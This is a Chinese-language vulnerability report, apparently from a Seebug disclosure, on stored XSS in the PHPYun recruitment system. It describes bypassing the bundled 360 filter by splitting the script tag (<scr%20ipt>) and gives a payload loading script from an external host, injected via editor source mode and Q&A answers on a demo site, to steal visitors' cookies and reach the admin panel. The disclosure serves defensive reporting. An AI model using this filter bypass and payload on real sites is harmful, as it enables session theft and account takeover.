### 简要描述:
php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户。
360防护挂掉了,这该怎么办。。
### 详细说明:
虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤
但是我意外的发现了一种绕过方法,从而对多处产生xss影响
先说下绕过方法
<script>肯定是过不了的,但是<scr%20ipt>就可以了
至于这个%20加哪就随意了,总之就是不要使句子完整出现,这样可以绕过360,然后是数据提交后,会变回<script>,从而绕过。
可以利用的xss地方很多 凡是有编辑器,源码模式下直接插入<scr%20ipt src="http://XXXX"></sc%20ript>就行
以官网demo为例子,除了上述地方可以插入xss代码外,在http://www.hr135.com/friend
[<img src="https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181400da1e2209c95623f7cf80f0ea0c44c9de.png)
到个人中心看一下
[<img src="https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21181418dd4418d0c5a88ea564875ee7a9015577.png)
成功插进去
也就是说当别人访问自己的空间时,就可以盗取对方cookie
再说下一处Xss漏洞
举例地址:http://www.hr135.com/ask/index.php
回答别人的问题
[<img src="https://images.seebug.org/upload/201407/211854386ec52c576300dcc0d30294cbb93697e2.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/211854386ec52c576300dcc0d30294cbb93697e2.png)
[<img src="https://images.seebug.org/upload/201407/21185451da96a91a8a790fde04bb9d9519d92734.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21185451da96a91a8a790fde04bb9d9519d92734.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201407/2118225584ad6392eb31f761815ec1ccac85cd64.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2118225584ad6392eb31f761815ec1ccac85cd64.png)
[<img src="https://images.seebug.org/upload/201407/21182302cc93199c77a497f43b3fef9806d6d23b.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/21182302cc93199c77a497f43b3fef9806d6d23b.png)
有了后台的权限 自然。。。
暂无评论